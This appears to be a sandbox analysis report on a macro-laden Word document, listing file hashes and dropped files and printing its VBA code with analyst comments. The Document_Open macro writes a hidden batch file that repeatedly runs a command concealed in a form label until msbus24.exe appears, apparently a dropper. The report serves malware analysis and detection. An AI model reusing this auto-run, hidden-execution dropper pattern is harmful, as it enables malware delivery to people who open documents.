Password Protected Microsoft Word Document Analysis | Files
File Information
Sample files count 1
Created files count 7
Modified files count 2
c:\users\hjrd1koky ds8lujv\desktop\3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64.doc
-
File Properties
Names c:\users\hjrd1koky ds8lujv\desktop\3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64.doc (Sample File)
Size 25.50 KB (26112 bytes)
Hash Values MD5: 52ecd34af06455f0cd252661db1ab097
SHA1: 50011011d34e3bcd80672cc91de8c6bd5a2be52e
SHA256: 3a813df1c8f1e835cc98dd60b799c64e61db51a259ee30b7235004ccb3c9df64
VBA Information
+
VBA Properties
Module Count 1
Macro Count 1
ThisDocument.cls - Open Document
+
' Analyst summary: auto-run handler in ThisDocument. Word calls Document_Open
' when the document is opened with macros enabled. The routine writes a batch
' file to %TEMP%\test.bat and launches it in a hidden window.
' The command that the batch file repeats is not in this module: it is read at
' run time from the caption of a label on UserForm1, so scanning only the
' macro source does not reveal it. The report lists the dropped test.bat
' (351 bytes), which holds the fully expanded script.
Private Sub Document_Open()

    ' Late-bound FileSystemObject; the second argument True overwrites any existing test.bat.
    Set fs = CreateObject("Scripting.FileSystemObject")
    Set a = fs.CreateTextFile(Environ("temp") + "\test.bat", True)
    
    ' Batch script body: a retry loop driven by the counter "num".
    a.WriteLine ("@echo off")
    a.WriteLine ("set num=0")
    a.WriteLine (":checkexist")
    ' Loop condition: %TEMP%\msbus24.exe does not exist yet AND num <= 20.
    a.WriteLine ("IF NOT EXIST " + Environ("temp") + "\msbus24.exe if %num% LEQ 20 (")
    ' Command text comes from the form label, not from a literal in this module.
    ' NOTE(review): presumably the step meant to produce msbus24.exe; the caption
    ' value is not shown on this page, so confirm against the dropped test.bat.
    a.WriteLine (UserForm1.Label1.Caption)
    ' Wait 20 seconds (not interruptible by keypress), bump the counter, retry.
    a.WriteLine ("TIMEOUT /t 20 /nobreak")
    a.WriteLine ("set /a num+=1")
    a.WriteLine ("GOTO checkexist )")
    ' Label is emitted but nothing follows it and no visible line jumps to it.
    a.WriteLine (":zipexist")
    a.Close
    
    ' vbHide runs the batch file with its window hidden.
    ' Detection angle: an Office process starting a .bat from the user's temp
    ' directory; the parent/child process names should be confirmed in the
    ' sandbox process tree, which is not part of this page.
    Shell Environ("temp") + "\test.bat", vbHide
    
End Sub
c:\users\hjrd1k~1\appdata\local\temp\test.bat
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\test.bat (Created File)
Size 0.34 KB (351 bytes)
Hash Values MD5: 855f89d5ae86649d772ae945ccdf5084
SHA1: 4ca8a6d7c6e2f1f277c1c99d7f287891f12604bd
SHA256: 1bc95054ee38df7db4c4208af2b71eac74d4ce3a1f37403f9a56f68cac31668d
c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp, ...
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\cab1e6a.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar1e6b.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp (Created File)
c:\users\hjrd1koky ds8lujv\appdata\local\temp\msbus24.exe (Created File)
Size 0.00 KB (0 bytes)
Hash Values MD5: d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709
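SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
Note: these MD5, SHA1 and SHA256 values are the standard digests of zero-length data (the files were 0 bytes when captured), so they match any empty file and are not usable as indicators for this sample.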
c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp, ...
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\cab1dfb.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\cab1e6a.tmp (Created File)
Size 51.38 KB (52608 bytes)
Hash Values MD5: ff9672cd98bf5d41722d2d1207344c67
SHA1: 98ebe6d49d1d9d4add4bf9219fe2ded40cba33f3
SHA256: 756f4d557302e49bce6623db9bd324c7b05c36b8bb884bbefbbe6b7f53422a54
c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp, ...
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\tar1dfc.tmp (Created File)
c:\users\hjrd1k~1\appdata\local\temp\tar1e6b.tmp (Created File)
Size 122.35 KB (125286 bytes)
Hash Values MD5: 8237156ad13c2cd7c5cc2faa6969fd86
SHA1: e5481457795650900ee04db955c87224e2db32f0
SHA256: 1a9094d2695f9bfbbf047639227e94f9e838cb0bee18e14b1aed00054faef825
c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
-
File Properties
Names c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB (344 bytes)
Hash Values MD5: 96b91c3aa1e304f9f1e5330e1ced1f15
SHA1: fdd22e500e3d7d3f9464de971449d31789c26f8f
SHA256: 3e9741fc1d84a8d2fdbb3d58512b1729d75ce116711fc664f6bf52642e433d3d
c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\cab35d2.tmp (Created File)
Size 51.73 KB (52967 bytes)
Hash Values MD5: 26763abb95381e4931c194e34023c33a
SHA1: e1b8114caa3a6b173c2e04e356a5065e7b2ca968
SHA256: 49f2686e30a59fabf11db1234c377497cf09e941ff50a0346854d087e8b08587
c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\tar35d3.tmp (Created File)
Size 123.21 KB (126167 bytes)
Hash Values MD5: 0dab7711a89d642ffe6ea216d92e56c1
SHA1: f2295d85679189d4fc1aac7c761be81447299ec5
SHA256: 163a6d7aaf9374ae4f1b4ee744a906b68da772aaa22095b4ecae709fb6d889e5
c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015
-
File Properties
Names c:\users\hjrd1koky ds8lujv\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 (Modified File)
Size 0.34 KB (344 bytes)
Hash Values MD5: 0134df8e2b4d52d156721c444cf96cb5
SHA1: 528e03a25cbd2530d36bea604c4558b239e01c31
SHA256: 0581e2081709fc97843a4ed093c4de023a971ff449492d41239895b30a387b14
c:\users\hjrd1k~1\appdata\local\temp\~dfc85a57e507447d72.tmp
-
File Properties
Names c:\users\hjrd1k~1\appdata\local\temp\~dfc85a57e507447d72.tmp (Created File)
Size 0.50 KB (512 bytes)
Hash Values MD5: bf619eac0cdf3f68d496ea9344137e8b
SHA1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5
SHA256: 076a27c79e5ace2a3d47f9dd2e83e4ff6ea8872b3c2218f66c92b89b55f36560